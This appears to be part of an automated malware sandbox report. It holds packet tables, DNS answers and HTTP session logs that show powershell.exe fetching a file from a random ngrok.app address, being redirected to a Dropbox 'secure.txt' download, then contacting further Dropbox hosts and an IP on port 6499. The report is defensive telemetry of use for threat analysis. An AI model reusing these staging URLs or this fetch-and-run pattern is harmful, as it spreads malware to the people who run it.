                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.308446884 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.308500051 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.309248924 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.309437037 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.309580088 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.309711933 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.310518980 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.310610056 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.311532021 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.311599016 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.311649084 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.311665058 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.312563896 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.312627077 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.313570023 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.313611031 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.313813925 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.314071894 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.314637899 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.314727068 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.314793110 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.315669060 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.315736055 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.315805912 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.316673994 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.316772938 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.316864967 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.317708015 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.317814112 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.318725109 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.318823099 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.319686890 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.319766045 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.319927931 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.319996119 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.320780039 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.320848942 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.320959091 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.321794987 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.321914911 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.322873116 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.322990894 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.323020935 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.323062897 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.323901892 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.324018955 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.324182987 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.324898005 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.324997902 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.325922012 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.498580933 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.498617887 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.498632908 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.499679089 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.499702930 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.500724077 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.527112007 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.541968107 CET498916499192.168.2.5162.213.210.250
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.646523952 CET649949891162.213.210.250192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:11.661243916 CET649949891162.213.210.250192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.410815954 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.411941051 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.414113998 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489263058 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489830017 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.489851952 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.498840094 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.499919891 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.503259897 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.504000902 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.506309986 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.528999090 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.686991930 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.692167997 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.722902060 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.722950935 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.469376087 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.469541073 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.784220934 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.788609982 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.788629055 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.789006948 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.846612930 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:29.846915960 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.161799908 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163341045 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163479090 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.163654089 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.717911959 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.718580961 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.719827890 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:30.721046925 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.033868074 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035154104 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035164118 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035348892 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.035598040 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.036066055 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.036990881 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.037554979 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:31.039804935 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.298599005 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.298891068 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.300137043 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.300231934 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.613372087 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.615160942 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.616009951 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.617518902 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.617615938 CET44363213172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.621454954 CET63213443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.627265930 CET44365084162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:32.627525091 CET65084443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.475019932 CET5679553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET53567951.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 10, 2024 18:40:25.181634903 CET | 192.168.2.5 | 1.1.1.1 | c27b | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:06.911237001 CET1.1.1.1192.168.2.50x7918No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:06.911237001 CET1.1.1.1192.168.2.50x7918No error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:10.052923918 CET1.1.1.1192.168.2.50x342fNo error (0)uc31f787c2bb602858cae290072a.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:10.052923918 CET1.1.1.1192.168.2.50x342fNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:20.366527081 CET1.1.1.1192.168.2.50x14c0No error (0)ucde441054600e534d842ed4b29b.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:20.366527081 CET1.1.1.1192.168.2.50x14c0No error (0)edge-block-www-env.dropbox-dns.com162.125.65.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.520953894 CET1.1.1.1192.168.2.50x71fbNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.520953894 CET1.1.1.1192.168.2.50x71fbNo error (0)www-env.dropbox-dns.com162.125.65.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.521651030 CET1.1.1.1192.168.2.50x31f4No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.837246895 CET1.1.1.1192.168.2.50x6dd2No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.837246895 CET1.1.1.1192.168.2.50x6dd2No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:21.925753117 CET1.1.1.1192.168.2.50x210eNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.368081093 CET1.1.1.1192.168.2.50xbd4eNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:24.472604990 CET1.1.1.1192.168.2.50x11b9No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.047939062 CET1.1.1.1192.168.2.50x9fb6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075062037 CET1.1.1.1192.168.2.50xa234No error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075062037 CET1.1.1.1192.168.2.50xa234No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075079918 CET1.1.1.1192.168.2.50xf6bdNo error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.075079918 CET1.1.1.1192.168.2.50xf6bdNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.169615030 CET1.1.1.1192.168.2.50xc210No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.169615030 CET1.1.1.1192.168.2.50xc210No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.181548119 CET1.1.1.1192.168.2.50x2b9bNo error (0)uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277641058 CET1.1.1.1192.168.2.50xc039No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277641058 CET1.1.1.1192.168.2.50xc039No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.277870893 CET1.1.1.1192.168.2.50xf7dfNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278156996 CET1.1.1.1192.168.2.50xac0bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278156996 CET1.1.1.1192.168.2.50xac0bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.278588057 CET1.1.1.1192.168.2.50xc5e6No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.366796017 CET1.1.1.1192.168.2.50x8fffNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.367170095 CET1.1.1.1192.168.2.50x44f2No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:25.367170095 CET1.1.1.1192.168.2.50x44f2No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.396714926 CET1.1.1.1192.168.2.50xdf7cNo error (0)uc48b83ada642288f62fac023367.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:28.396714926 CET1.1.1.1192.168.2.50xdf7cNo error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET1.1.1.1192.168.2.50xec81No error (0)uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:40:35.783879042 CET1.1.1.1192.168.2.50xec81No error (0)edge-block-www-env.dropbox-dns.com162.125.69.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:23.695142031 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:23.695142031 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:24.703497887 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:24.703497887 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:25.719945908 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:25.719945908 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:27.719815016 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:27.719815016 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:31.732589960 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              Dec 10, 2024 18:41:31.732589960 CET1.1.1.1192.168.2.50xb42dNo error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                              • 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                              • www.dropbox.com
                                                                                                                                                                                                                                                                                              • uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • ucde441054600e534d842ed4b29b.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                              • uc4fa19f877cae91b421b071987f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                              • uc48b83ada642288f62fac023367.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              • uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 3.125.209.94 | 443 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:04 UTC | 230 | OUT | GET /api/secure/fc08667ad2d7db61431b61a30eb0ffa8 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-12-10 17:40:06 UTC | 321 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                              Content-Length: 395
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:06 GMT
                                                                                                                                                                                                                                                                                              Location: https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1
                                                                                                                                                                                                                                                                                              Server: Werkzeug/3.0.3 Python/3.12.8
                                                                                                                                                                                                                                                                                              Connection: close
2024-12-10 17:40:06 UTC | 395 | IN | Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&amp;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 162.125.65.18 | 443 | 5660 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:40:08 UTC | 236 | OUT | GET /scl/fi/ptzcgw4lpru9m0531rddz/secure.txt?rlkey=m4b7p25r8ky8361o8wsoc61f9&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
2024-12-10 17:40:09 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; media-src https://* blob: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/docum [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc31f787c2bb602858cae290072a.dl.dropboxusercontent.com/cd/0/get/CgBHN7V4UpDgKe31HldoFFzKutRHjxM9_EBL4DkUaCCtxwkkvlab40YkWDFZ5l4XM2gdR9NDRulR25pRLfkvdAiM_xLltvLXa_RbPE2lJGCd5gVq17lVzdUA4JD5qOjxhe7SyH6B1PnrFyZ7wFjbDf_P/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=OTQxNzc1Nzk5Nzk4NTQ4NDM0NjcxNDIxNDgwMzIwNTkwMjQ1MQ==; Path=/; Expires=Sun, 09 Dec 2029 17:40:08 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=MKvJKaTODHWgWD41cqMKRksp; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:08 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=MKvJKaTODHWgWD41cqMKRksp; Path=/; Expires=Wed, 10 Dec 2025 17:40:08 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=hxwakN2Jp4; Path=/; Expires=Wed, 10 Dec 2025 17:40:08 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:08 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:09 GMT
